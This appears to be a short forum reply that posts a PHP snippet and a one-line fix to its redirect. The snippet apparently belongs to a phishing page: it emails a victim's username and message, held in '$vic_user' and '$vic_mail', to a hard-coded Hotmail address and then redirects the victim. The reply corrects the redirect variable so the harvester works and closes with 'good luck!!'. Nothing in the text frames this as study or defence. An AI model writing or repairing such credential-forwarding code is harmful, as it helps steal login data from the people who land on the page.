if ($lang == "ara" && $my_rmail == "sham3at_7ezen@hotmail.com")
{
mail("$my_rmail", "$vic_user", "$message", "From : " . $vic_mail);
$ok1 = "http://localhost/ara-152025226.php?id=$id";
header( "Location: $okurl" ) ;
}
change this:
header( "Location: $okurl" ) ;
to this:
header( "Location: $ok1" ) ;
hope this helps,
good luck!!